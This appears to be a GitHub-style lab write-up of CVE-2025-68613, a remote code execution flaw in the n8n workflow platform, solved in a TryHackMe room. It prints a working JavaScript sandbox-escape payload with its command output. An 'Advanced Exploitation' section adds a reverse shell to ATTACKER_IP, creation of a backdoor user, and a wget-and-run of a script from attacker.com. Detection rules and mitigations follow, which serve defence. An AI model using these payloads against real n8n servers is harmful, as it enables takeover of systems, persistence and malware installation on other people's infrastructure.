Share
## https://sploitus.com/exploit?id=470338FB-18DD-541A-863D-D73CBD4D9420
# CVE-2025-68613 โ€“ n8n Critical RCE Exploitation

## Overview

This repository documents a hands-on exploitation of **CVE-2025-68613 (CVSS 9.9)**, a critical Remote Code Execution vulnerability affecting the **n8n workflow automation platform** (versions 0.211.0 through 1.120.3).

This exploitation was performed **ethically** in a controlled **TryHackMe lab environment** for educational purposes only.

---

## Vulnerability Summary

| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2025-68613 |
| **CVSS Score** | 9.9 (Critical) |
| **Published** | December 19, 2025 |
| **Affected Product** | n8n Workflow Automation Platform |
| **Vulnerability Type** | Expression Injection โ†’ Sandbox Escape โ†’ RCE |
| **Attack Vector** | Authenticated User (Default) |
| **Patched Versions** | 1.120.4, 1.121.1, 1.122.0+ |
| **Affected Versions** | 0.211.0 - 1.120.3 |

---

## What is n8n?

n8n is an open-source workflow automation platform that allows users to visually connect applications and services for task automation. It features:

- **Node-based workflow architecture**: Each node represents an action (API request, data processing, email, etc.)
- **400+ native integrations**: Pre-built connectors to various APIs and services
- **Code nodes**: Custom JavaScript or Python code execution
- **Expression evaluation**: Dynamic expressions wrapped in `{{ }}` evaluated as JavaScript

### Deployment Models
- Self-hosted instances (on-premises or private cloud)
- Cloud-hosted (n8n.cloud) managed service
- Internal automation tools within corporate networks

---

## Technical Background

### The Vulnerability Chain

The vulnerability resides in n8n's **workflow expression evaluation system**. When authenticated users configure workflows, their input is processed as JavaScript code without adequate sandboxing.

#### Context Escalation Chain

```
Expression Sandbox
    โ†“ (escape via 'this')
Node.js Global Context
    โ†“ (access mainModule)
Module System (require)
    โ†“ (load child_process)
System Command Execution
```

### Key Flaws

1. **Insecure Expression Evaluation**: User expressions wrapped in `{{ }}` are evaluated as raw JavaScript without proper context isolation
2. **Sandbox Escape**: Access to `this` object allows escape from intended sandbox restrictions
3. **Unrestricted Module Access**: `process.mainModule.require()` provides access to Node.js module system
4. **Dangerous Module Loading**: Can load `child_process` module for system command execution
5. **No Meaningful Authentication Protection**: Any authenticated user can exploit the vulnerability

### Exploit Payload Breakdown

```javascript
(function(){ 
  return this.process.mainModule.require('child_process').execSync('COMMAND').toString() 
})()
```

**Explanation:**
- `this` โ†’ Node.js global object
- `this.process` โ†’ Node.js process object
- `process.mainModule` โ†’ Root module of n8n application
- `.require('child_process')` โ†’ Load system command execution module
- `.execSync('COMMAND')` โ†’ Execute shell command synchronously
- `.toString()` โ†’ Convert Buffer output to readable string

---

## Exploitation Walkthrough

### Step 1: Authentication

Access the vulnerable n8n instance and log in with valid credentials.

**Lab Credentials:**
- Email: `tryhackme@thm.local`
- Password: `Try12345!`

![Login Screen](screenshots/01-login.png)

---

### Step 2: Welcome & Workflow Creation

After login, you're presented with the workflow creation interface. Click "Start from scratch" to begin a new workflow.

![Welcome Screen](screenshots/02-Welcome.png)

---

### Step 3: Add Manual Trigger

Click "Add first step" and search for "Manual Trigger". This node serves as the entry point for workflow execution.

![Manual Trigger Setup](screenshots/03-Manual_Trigger.png)

**Purpose:** The Manual Trigger node allows manual execution of the workflow via the "Execute workflow" button in the UI, making it ideal for testing.

---

### Step 4: Configure Workflow & Add Field Mapping

Add an "Edit Fields" node to perform field mapping. This is where the vulnerability is exploited.

![Workflow Configuration](screenshots/04-Workflow-setup.png)

**Configuration Steps:**
1. Click "Add field" to add a new field mapping
2. Set the mode to "Expression" 
3. This allows JavaScript code evaluation

---

### Step 5: Execute ID Command

Inject the payload to execute the `id` command and retrieve user/privilege information.

**Payload:**
```javascript
(function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })()
```

**Result:**
```
uid=1000(node) gid=1000(node) groups=1000(node)
```

![ID Command Execution](screenshots/05-rce_id.png)

**Information Gathered:**
- Running as non-root user (uid=1000)
- Group membership (gid=1000)
- Potential privilege escalation paths

---

### Step 6: Enumerate File System with LS

Modify the payload to execute `ls` command and list directory contents.

**Payload:**
```javascript
(function(){ return this.process.mainModule.require('child_process').execSync('ls -la').toString() })()
```

![LS Command Execution](screenshots/06-Change_id_ls.png)

**Output Shows:**
- Flag file present: `flag.txt`
- Directory structure and file permissions
- Additional reconnaissance data

---

### Step 7: Extract Sensitive Data

Read the flag file using `cat` command to complete the exploitation.

**Payload:**
```javascript
(function(){ return this.process.mainModule.require('child_process').execSync('cat flag.txt').toString() })()
```

**Flag Retrieved:**
```
THM{n8n_exposed_workflow}
```

![Flag Extraction](screenshots/rce_cat_flag.png)

---

## Advanced Exploitation Techniques

### 1. Reverse Shell

Establish interactive shell access for persistent control:

```javascript
(function(){ 
  return this.process.mainModule.require('child_process').execSync('bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1').toString() 
})()
```

### 2. Create Backdoor User

Add a new system user for persistent access:

```javascript
(function(){ 
  return this.process.mainModule.require('child_process').execSync('useradd -m -p $(openssl passwd -1 PASSWORD) backdoor').toString() 
})()
```

### 3. Download Malicious Payload

Fetch and execute remote code:

```javascript
(function(){ 
  return this.process.mainModule.require('child_process').execSync('wget http://attacker.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh').toString() 
})()
```

### 4. Privilege Escalation Enumeration

Check for sudo privileges:

```javascript
(function(){ 
  return this.process.mainModule.require('child_process').execSync('sudo -l').toString() 
})()
```

### 5. Environment Reconnaissance

Extract environment variables:

```javascript
(function(){ 
  return this.process.mainModule.require('child_process').execSync('env').toString() 
})()
```

---

## Detection Strategies

### Web Proxy Logging (Nginx)

Configure your proxy to log request bodies for analysis:

```nginx
http {
    log_format detailed '$remote_addr - $remote_user [$time_local] '
                       '"$request" $status $body_bytes_sent '
                       '"$http_referer" "$http_user_agent" '
                       'Request-Body: "$request_body" '
                       'Duration: $request_time s';
    
    access_log /var/log/nginx/detailed_access.log detailed;
}
```

### Sigma Detection Rule

Detect exploitation attempts via workflow API requests:

```yaml
title: CVE-2025-68613 - n8n Expression Injection RCE
logsource:
    category: web_application_firewall
detection:
    keywords:
        - "process.mainModule.require"
        - "child_process"
        - "execSync"
    condition: keywords
filter:
    field: uri_path
    value: "/rest/workflows"
    method: POST
```

### Process Creation Monitoring

Monitor for suspicious child processes spawned by n8n:

- Watch for unexpected child_process spawning
- Monitor for reverse shell connections (bash, nc)
- Track suspicious file downloads/execution
- Alert on privilege escalation attempts

### Log Locations

- **n8n Logs**: `/root/.n8n/logs/`
- **System Logs**: `/var/log/auth.log`, `/var/log/syslog`
- **Workflow Execution Logs**: n8n database

### Indicators of Compromise

- Suspicious JavaScript expressions in workflow fields containing:
  - `process.mainModule`
  - `require('child_process')`
  - `execSync` or `spawn`
- Unusual child_process executions
- Unexpected workflow modifications
- Failed login attempts followed by successful access
- File system changes in unexpected directories

---

## Exploitation Timeline

| Step | Action | Time |
|------|--------|------|
| 1 | Access n8n instance | Seconds |
| 2 | Create/modify workflow | < 1 minute |
| 3 | Add field mapping node | < 1 minute |
| 4 | Inject and execute `id` command | < 30 seconds |
| 5 | Enumerate file system with `ls` | < 1 minute |
| 6 | Extract data with `cat` | < 30 seconds |
| **Total** | **Full RCE exploitation** | **< 5 minutes** |

---

## Mitigation & Prevention

### Immediate Actions

1. **Update n8n** to patched versions:
   - v1.120.4
   - v1.121.1
   - v1.122.0 or later

2. **Restrict Network Access**
   - Implement firewall rules to limit n8n access
   - Use VPN or bastion hosts for administrative access
   - Disable external exposure if not required

3. **Strong Authentication**
   - Enforce strong passwords
   - Implement multi-factor authentication (MFA)
   - Use SSO integration where possible

4. **Monitoring & Logging**
   - Enable detailed logging for all n8n activities
   - Monitor workflow modifications in real-time
   - Set up alerts for suspicious expressions

### Long-term Security Measures

1. **Input Validation & Sanitization**
   - Never evaluate user input as code
   - Implement expression whitelisting
   - Sanitize all workflow definitions

2. **Sandbox Implementation**
   - Isolate expression evaluation in restricted sandbox
   - Limit access to Node.js APIs
   - Use Virtual Machines or containers for isolation

3. **Principle of Least Privilege**
   - Run n8n with minimal required permissions
   - Restrict file system access
   - Limit network connectivity

4. **Code Review & Security Testing**
   - Regular security audits of custom nodes
   - Implement SAST/DAST tools
   - Conduct threat modeling exercises

---

## References

- [n8n Official Documentation](https://docs.n8n.io/)
- [n8n Security Policy](https://docs.n8n.io/reference/security/)
- [Node.js Child Process Module](https://nodejs.org/api/child_process.html)
- [OWASP Code Injection](https://owasp.org/www-community/attacks/Code_Injection)
- [CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code](https://cwe.mitre.org/data/definitions/95.html)
- [CVSS v3.1 Calculator](https://www.first.org/cvss/calculator/3.1)

---

## Lab Information

- **Platform**: TryHackMe
- **Room**: n8n: CVE-2025-68613
- **Room URL**: https://tryhackme.com/room/n8ncve202568613
- **Difficulty**: Medium to Hard
- **Learning Objectives**: Expression injection, sandbox escapes, RCE, detection strategies

---

## Disclaimer

This documentation is provided for **educational and authorized security testing purposes only**. The exploitation techniques described are intended for:

- Authorized penetration testing
- Security research in controlled environments
- TryHackMe lab practice
- Understanding security vulnerabilities

Unauthorized access to computer systems is **illegal**. Always obtain proper written authorization before conducting security testing.

---

## Repository Structure

```
.
โ”œโ”€โ”€ README.md                    # This file
โ”œโ”€โ”€ exploitation-details.md      # Technical deep-dive guide
โ”œโ”€โ”€ screenshots/
โ”‚   โ”œโ”€โ”€ 01-login.png
โ”‚   โ”œโ”€โ”€ 02-Welcome.png
โ”‚   โ”œโ”€โ”€ 03-Manual_Trigger.png
โ”‚   โ”œโ”€โ”€ 04-Workflow-setup.png
โ”‚   โ”œโ”€โ”€ 05-rce_id.png
โ”‚   โ”œโ”€โ”€ 06-Change_id_ls.png
โ”‚   โ””โ”€โ”€ rce_cat_flag.png
โ””โ”€โ”€ notes/
    โ””โ”€โ”€ exploitation-details.md
```

---

## Author Notes

This writeup documents the successful exploitation of CVE-2025-68613 on a TryHackMe lab environment. The vulnerability demonstrates the critical importance of secure code evaluation and the dangers of inadequate sandbox implementation in automation platforms.

Understanding this vulnerability helps both offensive security teams identify similar issues and defensive teams develop more effective detection strategies.